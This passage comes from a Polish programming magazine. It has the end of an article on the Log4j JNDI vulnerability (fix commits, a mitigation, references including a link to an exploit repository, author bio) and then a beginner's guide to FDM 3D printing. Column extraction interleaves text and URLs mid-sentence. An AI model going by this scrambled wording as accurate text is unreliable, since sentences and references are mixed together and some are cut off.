» https://logging.apache.org/log4j
a oficjalnie został ogłoszony 2 tygodnie później na Twitterze wraz » https://logging.apache.org/log4j/2.x/manual/lookups.html
z linkiem do kodu źródłowego exploita. Szacuje się, że błąd został » https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-45105
» https://www.lunasec.io/docs/blog/log4j-zero-day/
wprowadzony w roku 2013 i znaleziony dopiero po 8 latach. » https://github.com/ilsubyeega/log4j2-rce-exploit/
Poprawki do podatności pojawiły się 5 grudnia, 4 dni przed ogło- » https://docs.oracle.com/javase/jndi/tutorial/ldap/misc/ref.html
» https://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-
szeniem błędu na Twitterze. Niestety kod tych poprawek jest zbyt LDAP-Manipulation-To-RCE.pdf
długi, żeby go tutaj w całości przytoczyć. Zwrócić uwagę należy na-
tomiast na dwa commity o numerach d82b47c5 i 04637dd6. Pierwszy
z nich ogranicza protokół JNDI i wprowadza możliwość limitowania,
do jakich serwerów LDAP aplikacja może się łączyć. Druga zmiana MARIUSZ ZABORSKI
wyłącza domyślnie funkcjonalność Lookup. https://oshogbo.vexillium.org
Możliwe są także mitygacje tego błędu, na przykład przez wyłą- Ekspert bezpieczeństwa w grupie 4Prime.
czenie funkcjonalności Lookup. (służy do tego parametr log4j2. Wcześniej przez 8 lat współtworzył i zarządzał
zespołem programistów tworzących rozwiązanie
PAM w firmie Fudo Security. W wolnym czasie
5. https://github.com/apache/logging-log4j2/commit/d82b47c zaangażowany w rozwój projektów open-source,
6. https://github.com/apache/logging-log4j2/commit/04637dd w szczególności FreeBSD.

{ WWW.PROGRAMISTAMAG.PL } <65>
PLANETA IT

Druk 3D. Jak zrobić coś z niczego

Czasy, gdy druk 3D był niszową ciekawostką dostępną tylko dla zaawansowanych i znających
się dobrze na elektronice majsterkowiczów, minęły już dawno temu. Drukarki 3D oraz prze-
znaczone dla nich akcesoria są już powszechnie dostępne – i to w bardzo przystępnych ce-
nach. Aby jednak przygodę z drukiem 3D rozpocząć bezproblemowo, warto przyswoić sobie
wcześniej trochę wiedzy.

HISTORIA swobody, mogąca przemieszczać się w określonym zakresie wzdłuż

wszystkich trzech osi: X, Y i Z. Pomimo prostej konstrukcji jest to
Technologia druku 3D jest starsza niż mogłoby się nam wydawać. Jej również urządzenie stosunkowo precyzyjne: głowicę można umieścić
mgliste początki sięgają roku 1945, gdy w krótkim opowiadaniu scien- w przestrzeni z dokładnością do dziesiątych części milimetra. Do za-
ce-fiction „Things Pass By” Murray Leinster opisał urządzenie, które stosowań domowych i amatorskich taka dokładność jest więcej niż
wykonuje w powietrzu wydruki przy pomocy stygnącego plastiku na zadowalająca.
podstawie zeskanowanego wcześniej obiektu. Podobny koncept poja- W konstrukcji każdej z drukarek znajdziemy kilka wspólnych
wił się w opowiadaniu „Tools of the Trade” pióra Raymonda F. Jonesa. elementów.
W roku 1971 zarejestrowano pierwszy patent (U.S. Patent 3596285A)
na urządzenie o nazwie „Liquid Metal Recorder”, co możemy zakwa-
lifikować jako pierwszy opis urządzenia drukującego w 3D, pozwa-
lającego na szybkie prototypowanie i produkcję zaprojektowanych
wcześniej kształtów. Najbardziej dynamiczny rozwój technologii na-
leżałoby jednak datować na lata 80. XX wieku, gdy praktycznie co
roku pojawiał się kolejny patent związany z drukiem 3D. Również
i w tej dekadzie, bo w roku 1988, opatentowano rozwiązanie o na-
zwie FDM (ang. Fused Deposition Modeling), które zastosowane jest
w większości współczesnych drukarek.
Zwolennicy mechanizmu patentowania rozwiązań technologicz-
nych twierdzą, że służy ono zwiększaniu konkurencji i wspieraniu
małych przedsiębiorstw. Mam na ten temat zupełnie odmienne zda-
nie, a opieram je po prostu na faktach: najwięcej małych firm produ-
kujących komercyjne drukarki 3D powstało po roku 2009, kiedy…
wygasł patent S. Scotta Crumpa, wynalazcy technologii FDM. Dodaj-
my, że w roku 1980 posiadanie drukarki 3D wiązało się z konieczno- Rysunek 1. Drukarka 3D (źródło: blackfrog.pl/drukarka-3d-creality-ender-3-175-mm-p-1882.html)

ścią wydania (w przeliczeniu na dzisiejsze pieniądze) równowartości

około 2 600 000 PLN. 1. Stół roboczy – miejsce, gdzie powstaje wydruk. Jest on zwykle
ogrzewany grzałką znajdującą się pod jego spodem. Najczę-

SPOSÓB DZIAŁANIA DRUKARKI FDM
Na wstępie chciałbym zaznaczyć, że FDM jest zaledwie jedną z wielu
technik drukowania 3D. Wiele z nich wymaga kosztownego sprzę-
tu i materiałów, ale technologia idzie do przodu i pojawiają się już
powoli drukarki takie jak na przykład Creality LD-002H (drukująca
w technologii DLP), których cena i parametry (np. zapotrzebowanie
na energię elektryczną i wymiary) może kwalifikować je do zastoso-
wań amatorskich. Tym niemniej FDM wciąż jest najpopularniejszą
i przez to również okrzepłą techniką drukowania, więc w mojej oce-
nie nadaje się najlepiej dla początkującego adepta – metaforycznie
rzecz ujmując – tworzenia czegoś z niczego.
Drukarka FDM w swojej istocie jest urządzeniem CNC (ang. Com-
puterized Numerical Control – komputerowe sterowanie urządzeń
numerycznych). Sercem całej maszyny jest głowica o 3 stopniach
ściej stosuje się tanie, ale mające bardzo dobre właściwości łoża
szklane. Na zdjęciu widać stockowe łoże z materiału przypomi-
nającego nieco papier ścierny.
2. Silniki krokowe sterujące osiami X, Y i Z. Za oś Z przyjmuje się
oś skierowaną pionowo do góry (prostopadłą do łoża).
3. Głowica drukarki. Wewnątrz znajduje się blok grzewczy, który
topi filament.
4. Wentylator chłodzący blok grzewczy (zapobiega jego przegrzaniu).
5. Wentylator studzący wydruk (nawiewa powietrze zaraz pod gło-
wicę drukującą).
6. Dysza głowicy drukującej (zwykle w formie metalowego stożka
z niewielkim otworem – najczęściej o średnicy 0.4 mm, ale by-
wają mniejsze i większe).
7. Ekstruder. Zwykle składa się z silnika krokowego, na którego osi
zamocowana jest mała zębatka o ostrych ząbkach, do której do-

<66> { 2 / 2022 < 101 > }

PLANETA IT

ciskany jest filament. Jej obrót powoduje wsuwanie filamentu do

rurki i w efekcie podawanie go do bloku grzewczego. Na zdjęciu
możemy zobaczyć ekstruder wyposażony w rurkę, tzw. Bowden,
ale istnieją też ekstrudery podające filament bezpośrednio do
bloku grzewczego (mocowane zaraz nad nim, na karetce).
8. Zasilacz.
9. Elektronika – płyta główna drukarki wraz ze sterownikami sil-
ników krokowych.
10. Wyświetlacz i enkoder, przy pomocy którego możemy konfigu-
rować drukarkę i sterować wydrukami.

Na powyższym zdjęciu brakuje uchwytu na szpulę z filamentem,

który w tym konkretnym modelu zamontowany jest na górnej bel-
ce drukarki, ale w praktyce może znajdować się gdziekolwiek, nawet
obok drukarki.
Samo drukowanie składa się z kilku etapów.
1. Włączamy drukarkę. Następnie wkładamy do slotu kartę SD z od-
powiednio przygotowanym plikiem do wydruku lub podłącza-
my do komputera przy pomocy kabla USB (wtedy komputer
steruje drukarką bezpośrednio).
2. Nagrzewamy stół oraz głowicę. Nagrzanie stołu powoduje, że
pierwsza warstwa wydruku będzie lepiej do niego przylegała. Rysunek 3. Zbliżenie obszaru wydruku
3. Rozpoczynamy wydruk (na drukarce, gdy drukujemy z karty
SD, lub na komputerze, jeśli to on będzie sterował wydrukiem). Wydruk powstaje poprzez generowanie kolejnych, nakładających się
4. W trakcie wydruku ekstruder wpycha do bloku grzewczego fi- na siebie warstw. Po wydrukowaniu każdej z nich głowica podnoszona
lament, który topi się i wydobywa przez głowicę na zewnątrz. jest o zadaną wysokość (zwykle 0.1-0.2 mm) i rozpoczyna drukowanie
W tym samym czasie głowica przesuwa się wzdłuż zaplanowa- kolejnej warstwy. Ma to kilka bardzo istotnych konsekwencji: wzdłuż
nej wcześniej trasy, pozostawiając za sobą warstewkę stygnącego osi Z wydruk nigdy nie jest gładki, każdy skos i łuk składa się z dużej
filamentu. Temperatury topnienia filamentu sięgają okolic 200 liczby „schodków” (w zależności od rozdzielczości druku w tej osi).
stopni Celsjusza, więc w temperaturze pokojowej materiał ten
szybko zastyga, tworząc lity blok plastiku o zadanym kształcie.

Rysunek 4. Gotowy wydruk. Widać charakterystyczne „schodki” zamiast skosów (np. na dachu)

OD MODELU DO G-CODE
Wydruk sterowany jest przy pomocy komend napisanych w specjal-
nym języku zwanym G-code. Język ów ma długą, siwą brodę, bo jego
pierwsza wersja powstała w roku 1950, a został on stworzony spe-
cjalnie na potrzeby urządzeń CNC. Komenda w G-Code składa się
z identyfikatora polecenia (przeważnie litery i jednej lub dwóch cyfr),
po których następują opcjonalne parametry. Przykładowy, napisany
Rysunek 2. Drukarka 3D w czasie trwania wydruku – zdjęcie termowizyjne
w G-Code fragment instrukcji sterowania drukarki może wyglądać
następująco:

<68> { 2 / 2022 < 101 > }


Listing 1. Fragment skryptu w formacie G-Code
G92 E0
G28
G1 Z2.0 F3000
G1 X0.1 Y20 Z0.3 F5000.0
G1 X0.1 Y200.0 Z0.3 F1500.0 E15
Oznacza on w kolejności:
» Zresetowanie licznika filamentu (poinformowanie drukarki, że
ekstruder w tym momencie znajduje się w pozycji „0”).
» Przemieszczenie głowicy do położenia domowego (ang. home),
czyli do punktu (0, 0, 0).
» Ustawienie głowicy 2 mm nad łożem, przesunięcie z prędkością
3000 mm/min.
» Przesunięcie głowicy do pozycji (0.1, 20, 0.3) z prędkością 5000
mm/min.
» Przesunięcie głowicy do pozycji (0.1, 200.0, 0.3) z prędkością
1500 mm/min oraz wytłoczenie w tym czasie 15 mm filamentu.
I tak dalej: kolejne instrukcje mówią drukarce, jakie dokładnie czyn-
ności powinna ona wykonywać, a ta ogranicza się do ich bezmyślnej
realizacji. Piszę „bezmyślnej” zupełnie świadomie, bo przy pomocy
odpowiednio przygotowanego G-Code możemy zmusić drukarkę,
żeby na przykład spróbowała przesunąć głowicę poprzez już wykona-
ny wydruk, co może skończyć się uszkodzeniem wydruku w najlep-
szym, a drukarki w najgorszym wypadku.
Znajomość G-Code nie jest w żadnej mierze konieczna do dru-
kowania 3D, ale czasem okazuje się być przydatna, o czym później.
G-Code – wierzcie lub nie – pisany był kiedyś ręcznie. I to do-
słownie: przed wprowadzeniem instrukcji do urządzenia CNC inży-
nierowie rozpisywali je wszystkie w notesie. Współcześnie nie ma już
takiej potrzeby, G-Code generowany jest automatycznie przez odpo-
wiednie oprogramowanie. Zacznijmy jednak od początku.
Wszystko zaczyna się od przygotowania modelu do wydruku.
Mamy tu, uogólniając, dwie główne opcje. Jeżeli zależy nam na wy-
drukowaniu obiektów o wartości artystycznej (na przykład figurek,
dekoracji itp.), to do ich stworzenia możemy posłużyć się oprogra-
mowaniem do modelowania 3D. Jeśli natomiast projektujemy ele-
ment jakiejś maszyny, obudowę lub część zamienną, to wtedy znacz-
nie wygodniej skorzystać jest z programów typu CAD. Pozwalają one
bowiem na projektowanie numeryczne, czyli precyzyjne definiowa-
nie wymiarów, odległości, kątów oraz geometrycznych relacji ele-
mentów szkicu.
Przy założeniu, że drukować będziemy amatorsko, hobbystycz-
nie, najbardziej interesować nas będą oczywiście rozwiązania darmo-
we. W przypadku modelowania 3D sprawa jest bardzo prosta, mamy
rewelacyjnego, otwarto-źródłowego Blendera (który w przeciągu
ostatnich kilku lat stał się tak funkcjonalny, że współcześnie używa
się go również komercyjnie), potem długo, długo, długo nic i dopiero
potem resztę innych, darmowych rozwiązań, którymi prawdopodob-
nie nie ma co zaprzątać sobie głowy.
Z oprogramowaniem typu CAD jest nieco trudniej, ale i tu nie
zostajemy na lodzie. Według mnie najlepszym programem do pro-
jektowania 3D jest Fusion360 ze stajni Autodeska, który dostępny
jest również w darmowej wersji przeznaczonej dla twórców (ama-
torów wydruku 3D określa się mianem „makerów” od angielskiego
{ WWW.PROGRAMISTAMAG.PL }
/ Druk 3D. Jak zrobić coś z niczego /
„make”, czyli tworzyć). Wersja ta ma wprawdzie kilka ograniczeń,
w szczególności można jednocześnie posiadać maksymalnie 10 edy-
towalnych projektów naraz (ale można swobodnie aktywować i dez-
aktywować je w ramach wspomnianego limitu), lista eksportowanych
formatów jest wyraźnie ograniczona, brakuje też zaawansowanych
funkcjonalności wspomagających produkcję i nie ma możliwości
przeprowadzania symulacji. O ile jednak ograniczenia na pierwszy
rzut oka mogą brzmieć zniechęcająco, to w praktyce właściwie w żad-
nym stopniu nie przeszkadzają w projektowaniu elementów do dru-
ku 3D.
Jeśli z jakiegoś powodu Fusion360 nie przypadnie komuś do gu-
stu, istnieją też inne opcje. Z komercyjnych produktów możemy wy-
liczyć DesignSpark Mechanical, SketchUp Free oraz OnShape Free,
które również mają darmowe wersje (ostatnie dwa działają w przeglą-
darce). Trochę liczyłem, że z czasem do tego grona dołączy Siemens
ze swoim świetnym SolidWorks, ale póki co dostępna jest jedynie
30-dniowa wersja testowa. Jeżeli natomiast chcemy pozostać wierni
rozwiązaniom FOSS, możemy skorzystać z FreeCada. Gdy zaczyna-
łem swoją przygodę z drukowaniem 3D, nie był on zbyt stabilny i wy-
godny w użyciu, ale jest on bardzo dynamicznie rozwijany i średnio
co półtora roku pojawia się nowa wersja.
Każdy ze wspomnianych programów daje możliwość wyeksporto-
wania zaprojektowanych brył do formatu STL (od: Stereolitography).
Również i ten format ma długą, siwą brodę i jest tekstowy (choć ma
też wersję binarną), a służy on do opisywania brył składających się
z trójwymiarowych wielokątów. Potrzebujemy go zaś dlatego, że jest
on najpopularniejszym formatem akceptowanym przez tzw. slicery,
czyli programy generujące instrukcje G-Code dla drukarek 3D.
Jak pamiętamy, wydruk w technologii FDM polega na nakładaniu
na siebie przez drukarkę kolejnych, płaskich warstw materiału. Aby
więc móc wydrukować zaprojektowaną przez nas wcześniej bryłę,
musimy pociąć ją na płaskie przekroje, a potem zaplanować, w jaki
sposób drukarka będzie każdy z nich drukować. Zadaniem tym zaj-
muje się właśnie slicer, którego nazwa stosunkowo dobrze oddaje
sposób działania (z ang. slice oznacza szatkować, ciąć na plasterki).
Proces generowania G-Code na podstawie przygotowanej przez
nas bryły nie jest łatwym zadaniem, ale pomimo tego wszystkie (zna-
ne mi) slicery są darmowe. Sam używam aplikacji Cura produkowa-
nej przez Ultimakera. Ultimaker ma w ofercie swoje własne drukarki,
ale Cura zawiera wbudowane domyślne ustawienia dla większości
drukarek na rynku. Nie miałem nigdy potrzeby rozglądać się za alter-
natywą, Cura robi naprawdę dobrą robotę, ale gdyby ktoś chciał za-
interesować się innymi rozwiązaniami, możemy wspomnieć jeszcze
o Meshmixerze od Autodeska czy też otwarto-źródłowym Slic3rze.
PULP FICTION, CZYLI ZAKUP DRUKARKI
Cofnijmy się jeszcze o jeden krok. Wiemy już, jak drukarka druku-
je bryły i jak (ogólnie) wygląda cały proces rozpoczynający się za-
projektowaniem obiektu, a kończący zdjęciem go z łoża drukarki po
zakończeniu wydruku. Aby jednak móc ten proces przeprowadzić,
musimy oczywiście na początku wyposażyć się w samą drukarkę.
No i tu zaczyna się robić ciekawie, a to dlatego, że drukarkę 3D
można najzwyczajniej w świecie zbudować samodzielnie. Na rynku
dostępne są bodaj wszystkie potrzebne komponenty, od aluminio-
<69>
PLANETA IT

wych ram, przez silniki krokowe, sterowniki silników i płyty główne Idziemy dalej. Czwartym powodem jest to, że do Endera 3 można
drukarek, bloki grzewcze, grzałki, głowice – czego dusza zapragnie. dokupić całą masę różnych modów i ulepszeń. Z czasem, jeżeli dru-
O ile jednak budowa drukarki ma ogromną wartość poznawczą kowanie 3D przypadnie nam do gustu, możemy na przykład wypo-
– w czasie tego procesu uczymy się bowiem praktycznie każdego sażyć się w lepszą płytę główną, która wyciszy silniki i zapewni kilka
aspektu jej pracy – trzeba mieć na uwadze, że wszystkie problemy dodatkowych zabezpieczeń (np. przed konsekwencjami wypadnięcia
trzeba rozwiązywać samodzielnie, no i oczywiście cały proces zajmu- grzałki z bloku grzewczego). Za niewielkie pieniądze możemy kupić
je sporo czasu. Mam kolegę, który rozpoczął budowę swojej drukar- też aluminiowy ekstruder, który jest o niebo lepszy od stockowego,
ki, ale w międzyczasie urodziła mu się dwójka dzieci i projekt musiał plastikowego (to polecam zrobić nawet od razu po zakupie drukarki,
zawiesić. Jeżeli więc budowanie urządzeń nie jest dla czytelnika in- bo mówimy o koszcie w granicach 50 PLN). Możemy też wymienić
teresujące samo w sobie, a bardziej zależy mu po prostu na samym wózek osi X na liniowy, blok grzewczy na tytanowy, który zapobiega
drukowaniu, chyba lepiej zebrać trochę pieniędzy i po prostu taką zatykaniu przez zastygnięty filament, albo zamontować drugą śrubę
drukarkę kupić. osi Z, co zwiększy nieco precyzję wydruku. W sprzedaży dostępny
Oczywiście natychmiast pojawi się pytanie: którą? Na rynku do- jest też dotykowy ekran, kompatybilny z ulepszoną płytą główną,
stępna jest ogromna liczba drukarek różnych producentów: Cre- a także bardziej zaawansowane modyfikacje, jak na przykład bezpo-
ality3D, Prusa, Ultimaker – żeby wymienić tych najbardziej popu- średni ekstruder czy też czujnik, przy pomocy którego możemy auto-
larnych. Jeżeli mamy do dyspozycji odpowiednią sumę pieniędzy, matycznie poziomować wydruk.
można przebierać w opcjach, dlatego postaram się raczej skupić na To jeszcze nie wszystko. Na rynku można bez większych pro-
sytuacji, w której nasz budżet jest bardziej ograniczony. blemów dostać części zamienne do tej drukarki, na przykład silniki
Na rynku ostatnimi czasy pojawiło się wiele miniaturowych i ta- krokowe, płytę główną (jeśli ktoś bardzo polubi stockową) czy też na
nich drukarek, których cena oscyluje w okolicach 400 PLN. W du- przykład łoże razem z grzałką, wentylatory albo blok grzewczy. Jeśli
żym skrócie: unikamy. Są to urządzenia bardzo proste, o których poza w drukarce coś się uszkodzi, możemy stosunkowo łatwo to naprawić.
tym, że faktycznie próbują coś drukować, nie da się powiedzieć wiele I na sam koniec, standardową praktyką posiadaczy drukarek 3D jest
więcej dobrego. Mają one przeważnie bardzo małe pole robocze, co ulepszanie ich przy pomocy wydrukowanych elementów. Na popular-
znacząco ogranicza wymiary drukowanych przedmiotów, często nie nym repozytorium modeli do drukowania Thingiverse (thingiverse.com)
są w stanie podgrzewać łoża, co uniemożliwia drukowanie przy po- znajdziemy na przykład kompatybilne z Enderem 3: osłonę otworów
mocy niektórych materiałów, poziomowanie obszaru roboczego jest wentylacyjnych elektroniki, prowadnice filamentu, dzięki którym
w nich często mocno utrudnione, konstrukcja jest na tyle niedokład- trafia on do ekstrudera bardziej prostopadle, alternatywny, łożysko-
na, że odbija się to na niewielkiej precyzji wydruku i wreszcie możli- wany uchwyt na filament, który zmniejsza zużycie sterownika silni-
wości ewentualnej rozbudowy lub przebudowy są w praktyce żadne. ka ekstrudera, czy takie detale jak klipsy na kable albo szufladkę na
Istnieje jednak relatywnie niedroga drukarka, która świetnie na- potrzebne narzędzia, którą można umieścić w wolnym miejscu pod
daje się do rozpoczęcia przygody z drukowaniem 3D, a jest nią Cre- stołem roboczym.
ality3D Ender 3. Dlaczego właśnie ta? Można wymienić cały szereg
powodów.
Po pierwsze, doskonale mieści się ona w definicji budżetowej
drukarki. Obecnie dostępna jest za 899 PLN w polskich sklepach
(np. w botland.pl). Podpowiem też sprytniejszą metodę – można ją
również kupić w chińskim sklepie Gearbest (gearbest.com), ale wybrać
dostawę z Polski (Gearbest ma u nas magazyny). W ten sposób kupuje-
my wprawdzie w Chinach, ale urządzenie trafi do nas mniej więcej dwa
dni później. Tym sposobem zaoszczędzimy około 70 PLN. Dodajmy
tylko dla porównania, że najtańsza nowa Prusa, którą udało mi się zna-
leźć, kosztuje 2259 PLN, a za większy wariant, którego pole robocze ma
wymiary porównywalne do Endera 3, zapłacimy już 4500 PLN.
Drugim powodem, dla którego warto zainteresować się tym
modelem, jest fakt, iż nawet w stockowej konfiguracji drukuje ona
z bardzo przyzwoitą dokładnością. Rama zbudowana jest z solidnych
profili aluminiowych, a większość innych elementów jest też metalo-
wa, co w dużej mierze eliminuje wibracje i kołysanie się konstrukcji,
wpływając pozytywnie na wydruk. Podgrzewane łoże umożliwia też
drukowanie z takich materiałów, jak na przykład ABS.
Trzecim powodem jest to, iż drukarka ta jest niesamowicie popu-
larna. Dla przykładu, jeżeli zainteresujecie się kanałami na YouTube
poświęconymi drukowaniu 3D, przeważająca większość ich właści-
Rysunek 5. Łożyskowana prowadnica do filamentu – wydrukowana na drukarce 3D
cieli ma na stanie właśnie Endera w wersji 3 – nawet jeśli oprócz niej
posiadają więcej drukarek innych firm.

<70> { 2 / 2022 < 101 > }


Jeżeli tymi argumentami nie przekonałem czytelnika do zakupu
Endera 3, to niech powyższe zestawienie stanie się ogólnym prze-
wodnikiem, na co zwracać uwagę podczas poszukiwania wymarzo-
nej drukarki. Jako ciekawostkę mogę dodać, iż pomimo wprowa-
dzenia przez Creality kolejnych wersji Endera, „trójka” jest wciąż
produkowana i dostępna w sprzedaży.
MAM DRUKARKĘ – CO DALEJ?
Większość drukarek sprzedawana jest w stanie „częściowo złożo-
nym”. Oznacza to, że w pudełku znajdziemy kilka dużych części, któ-
re musimy skręcić ze sobą zgodnie z załączoną instrukcją. Bez obaw,
w większości przypadków sprowadza się to do przykręcania śrub
i nakrętek (odpowiednie klucze są zwykle dołączone) oraz podłącza-
nia wtyczek. Od siebie dodam kilka rzeczy, na które warto zwrócić
uwagę:
» Zadbajmy o dobre napięcie wszystkich pasków zębatych. Jeżeli
bowiem będą zbyt luźne, natychmiast odbije się to na niższej ja-
kości wydruków.
» Skalibrujmy czujniki krańcowe. Najlepiej na początku ustawić
je (te, które możemy samodzielnie przemieszczać) wyraźnie za
wysoko, a następnie włączyć w drukarce opcję powrotu do po-
zycji „0”. Pozwoli nam to ocenić, o ile jeszcze musimy krańcówki
przesunąć, by głowica znalazła się w minimalnej odległości nad
stołem. Wystarczy ustawić ją 1-2 mm nad obszarem roboczym,
bo docelową pozycję można skalibrować jeszcze, podnosząc lub
opuszczając stół.
» Przed pierwszym wydrukiem ustawmy prawidłowo wysokość sto-
łu. Najlepiej wziąć ulotkę z grubego papieru (o grubości 0,2 mm
lub zbliżonej) i spróbować wsunąć pomiędzy głowicę i stół robo-
czy. Powinno nam się to udać z lekkim, wyczuwalnym oporem.
Następnie ustawiamy głowicę ręcznie w czterech narożnikach
stołu roboczego (wyłączając wcześniej przy pomocy interfejsu
drukarki silniki krokowe) i w każdym z nich powtarzamy proce-
durę. Cały proces warto powtórzyć 2-3 razy.
Zanim zabierzemy się do zmaterializowania połowy Thingiverse-
’a, warto na początku wydrukować kostkę kalibracyjną (Calibration
Cube XYZ) oraz testową łódeczkę o nazwie Benchy (widoczną na
Rysunku 4), które pomagają sprawdzić, czy drukarka jest prawi-
dłowo przygotowana do wykonywania bardziej zaawansowanych
wydruków.
MOSTKI, SKOSY, PODPORY,
ANTYGRAWITACJA I KOŃ DO GÓRY
NOGAMI
Sposób realizacji wydruku w technologii FDM, czyli w szczególno-
ści nakładanie na siebie kolejnych przekrojów drukowanego obiektu,
niesie ze sobą pewne szczególne ograniczenia.
Najbardziej oczywistym jest rozmiar obszaru roboczego drukar-
ki. Na przykład Ender 3 pozwala drukować obiekty o maksymalnych
wymiarach 220x220x250 mm. Jeżeli potrzebujemy wydrukować więk-
szy obiekt, musimy podzielić go na części i potem połączyć je ze sobą
lub po prostu zaopatrzyć się w większą drukarkę.
{ WWW.PROGRAMISTAMAG.PL }
/ Druk 3D. Jak zrobić coś z niczego /
Naszym wrogiem jest też grawitacja. Skoro każda następna war-
stwa musi przylegać do poprzedniej, to w konsekwencji drukarka nie
będzie w stanie wydrukować niczego, co bezpośrednio pod sobą nie
ma materiału („wisi w powietrzu”). Ale są też wyjątki oraz sposoby
na obejście tego problemu.
Pierwszym wyjątkiem od powyższej reguły są tak zwane mostki,
czyli nitki filamentu, które drukarka rozwiesza pomiędzy dwoma „fi-
larami”. W czasie wydruku na głowicę nawiewane jest powietrze, któ-
re pomaga szybko wystudzić filament. Jeżeli mostek jest dostatecznie
krótki, powinien zdążyć zastygnąć zanim grawitacja „ściągnie” fila-
ment na dół. Co więcej, każda kolejna nitka mostka, oprócz tego, że
oprze się na „filarach”, przyklei się też do poprzedniej, zastygniętej
już nitki, co również pomoże utrzymać ją w miejscu. Zwróćmy uwa-
gę na Rysunek 4 – łódeczkę Benchy. Wejście do budki oraz przednie
i tylne okno zostały wydrukowane właśnie przy pomocy mostków.
Ograniczeniem dla mostków jest oczywiście ich długość. Slicery
są sprytne i wykrywają konieczność ustawienia mostka – w takiej sy-
tuacji pierwsze nitki, które będą wisieć w powietrzu, drukowane są
zwykle nieco szybciej niż reszta wydruku. Czasami jednak mostek
jest zbyt długi i problem trzeba rozwiązać inaczej.
Drugim wyjątkiem dotyczącym drukowania „wiszących” ele-
mentów są skosy, czyli ściany, które są nachylone do płaszczyzny
pod kątem mniejszym niż 90 stopni. Ponieważ wydruk odbywa się
warstwami, skosy takie budowane są w praktyce bardzo małymi frag-
mentami filamentu, które wystają nieco poza poprzednią warstwę. Są
one jednak na tyle małe, że kleistość płynnego filamentu wygrywa
z grawitacją. W przypadku Benchy’ego można to zaobserwować na
przykład w przypadku dzioba łódki, który stanowi taki właśnie skos.
Co dzieje się, jeśli nie mamy możliwości skorzystać z żadnego z po-
wyższych wyjątków? W takim przypadku pozostaje nam wydrukowa-
nie podpór – slicer przygotowuje cienkie i kruche elementy, których
zadaniem jest podparcie wydruku w kilku miejscach. Po zakończeniu
wydruku elementy takie należy usunąć (wyłamać). Jeżeli dysponuje-
my drukarką 3D potrafiącą drukować różnymi materiałami, do pod-
pór możemy zastosować materiał rozpuszczający się w wodzie – ich
usunięcie będzie wtedy znacznie prostsze.
Większość drukarek wyposażona jest tylko w jedną głowicę, więc
konieczność zastosowania podpór wiąże się z tym, że część wydruko-
wanego materiału trzeba będzie wyrzucić do kosza (a co gorsza, jest
to trudny w utylizacji plastik). Poza tym drukowanie podpór zajmuje
czas, więc warto dołożyć starań, by było ich jak najmniej.
Ciekawym rozwiązaniem jest alternatywna orientacja wydruku.
Na przykład drukowałem kiedyś figurkę konika dla córki; normalnie
musiałbym podeprzeć prawie cały wydruk (brzuch, ogon, szyję i gło-
wę). Wystarczyło jednak obrócić konia w taki sposób, że leżał na stole
do góry nogami. Powstało w ten sposób na tyle dużo skosów, że licz-
ba podpór drastycznie zmalała, a potrzebne podpory były znacznie
mniejsze. Skróciło to też czas wydruku z 21 do 15 godzin.
Możliwość zastosowania podpór pociąga za sobą inne, ciekawe
konsekwencje. Pewnego razu, podczas projektowania obudowy do
jakiegoś urządzenia, zapędziłem się za daleko z wierceniem otworów
i nie zauważyłem, że jej fragment literalnie zawisł w powietrzu. Slicer
grzecznie pokroił bryłę, drukarka wydrukowała z podporami i do-
piero po zdjęciu wydruku ze stołu uświadomiłem sobie, że trzymam
w ręce dwa kawałki projektowanego elementu.
<71>
PLANETA IT

Drugi problem, który doprowadził w końcu do wymiany płyty

głównej, zaczął się od tego, że drukarka zaczęła mieć problem z dru-
kowaniem linii: były one poszatkowane („dziurawe”) i słabej jakości.
Próbowałem rozwiązać problem przez podwyższenie temperatury
wydruku i przekonfigurowanie drukarki w taki sposób, by poda-
wała nieco więcej filamentu niż zaplanował to slicer. Na krótki czas
wydruki poprawiły się, ale później problem powrócił. Żyłowałem
te parametry jeszcze przez jakiś czas, aż w końcu ekstruder zamilkł
i drukarka przestała drukować.
Okazało się, że winny był ekstruder, a raczej to, w jaki sposób
był do niego podawany filament. W Enderze podajnik filamentu jest
umieszczony niezbyt szczęśliwie na górnej belce drukarki, przez co
nitka materiału podawana jest do niego pod dosyć dużym kątem.
Zamontowałem wówczas na drukarce tylko jedną prowadnicę fila-
mentu, co trochę pomogło, ale niestety niewystarczająco. Filament
Rysunek 6. „Normalna” orientacja
podczas wydruków był cały czas napięty, więc zaczął żłobić sobie
w ekstruderze nową szparę, w której musiał się chyba trochę klino-
wać, co skutkowało niedodrukowanymi liniami.
Przez to jednak, że cały czas zmuszałem ekstruder do wpycha-
nia coraz większej ilości filamentu, ten ostatni zaczął w końcu za-
pychać blok grzewczy, co z kolei potęgowało problem przerwanych
linii. Jednocześnie silnik ekstrudera musiał chyba często pracować na
zwarciu, bo próbował wepchnąć do bloku grzewczego większą ilość
filamentu, niż było to możliwe. W efekcie po jakimś czasie spalił się
na płycie głównej kontroler silnika krokowego ekstrudera i drukarka
stanęła.

Rysunek 7. Po obrocie

Orientacja wydruku ma też istotne znaczenie w kwestii jego wytrzy-

małości. W szczególności wydrukowany element będzie miał znacz-
nie mniejszą wytrzymałość na zginanie wzdłuż osi Z, bo jest on tam
podatny na pękanie wzdłuż warstw. W takim przypadku lepiej jest
obrócić go o 90 stopni – wtedy będzie on znacznie trwalszy. Rysunek 8. Uszkodzony stockowy ekstruder

CO MOŻE PÓJŚĆ NIE TAK? Aby naprawić drukarkę, musiałem kupić nową płytę główną (ale sko-
rzystałem z okazji i wyposażyłem się w lepszy zamiennik), aluminio-
Niestety, całkiem sporo. Na jakość wydruku wpływa bowiem ogrom- wy ekstruder (50 PLN) i głowicę z nowym hotendem (69 PLN). Po
na liczba czynników, między innymi prawidłowe wypoziomowanie wymianie wspomnianych komponentów drukarka drukuje jak nowa.
stołu, ustawienie głowicy w odpowiedniej odległości, sztywność kon-
strukcji, zabezpieczenie przed wibracjami, temperatura wydruku,
materiał, z którego zrobiony jest stół roboczy, parametry wydruku
ustawione w slicerze – można wymieniać bez końca.
Z mojego doświadczenia mogę podzielić się dwoma bardzo egzo-
tycznymi problemami. Pierwszym z nich było wydrukowanie przez
drukarkę tylko kilku pierwszych warstw, po których głowica zaczę-
ła jeździć w powietrzu, nic w tym czasie nie drukując. Okazało się,
że zaplątał się filament: szpule nie bez powodu mają na krawędziach
otworki, w które należy zawsze włożyć luźną końcówkę. Ekstruder
